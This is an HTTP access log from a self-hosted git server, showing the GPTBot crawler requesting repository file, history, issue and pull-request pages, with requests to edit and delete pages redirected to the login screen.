"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/i18n.js" -[17/Feb/2026:18:05:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/i18n.js?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/i18n.js" -[17/Feb/2026:18:05:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:18:05:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 11282] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" -[17/Feb/2026:18:05:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 11746] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" -[17/Feb/2026:18:05:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 11174] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Contact.tsx" -[17/Feb/2026:18:05:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 11169] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Footer.tsx" -[17/Feb/2026:18:05:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11190] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:18:05:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/Old_GoldMonitor.py?display=rendered" [Client 74.7.227.38] [Length 11112] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:18:05:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/.python-version?display=rendered" [Client 74.7.227.38] [Length 11123] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/.python-version" -[17/Feb/2026:18:05:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/env.example.txt?display=rendered" [Client 74.7.227.38] [Length 11125] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/env.example.txt" -[17/Feb/2026:18:05:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?state=all&type=all" [Client 74.7.227.38] [Length 9896] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" -[17/Feb/2026:18:05:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?state=all&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" -[17/Feb/2026:18:05:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17052] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:18:05:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:18:05:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:18:05:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/httpx" -[17/Feb/2026:18:05:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/httpx" -[17/Feb/2026:18:05:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:18:05:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:18:05:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/httpx" -[17/Feb/2026:18:05:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/httpx" -[17/Feb/2026:18:05:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 10665] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/httpx" -[17/Feb/2026:18:05:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 9825] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/httpx" -[17/Feb/2026:18:05:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 10238] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:18:05:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 9836] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:18:05:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:18:05:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 955] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:18:05:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 887] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/httpx" -[17/Feb/2026:18:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 248] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/httpx" -[17/Feb/2026:18:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:18:05:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9872] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:18:05:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 985] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:18:05:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/httpx" -[17/Feb/2026:18:05:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/httpx" -[17/Feb/2026:18:05:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/httpx" -[17/Feb/2026:18:05:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/httpx" -[17/Feb/2026:18:05:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:18:05:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:18:05:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:18:05:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:18:05:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17052] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:18:05:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11074] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:18:05:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11074] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:18:05:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10139] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&state=open&type=all" -[17/Feb/2026:18:05:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:05:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:05:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:05:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&state=closed&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=open&type=all" -[17/Feb/2026:18:05:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&state=closed&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:05:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&state=closed&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:05:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11016] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11016] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11017] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11017] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11016] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11017] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11015] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 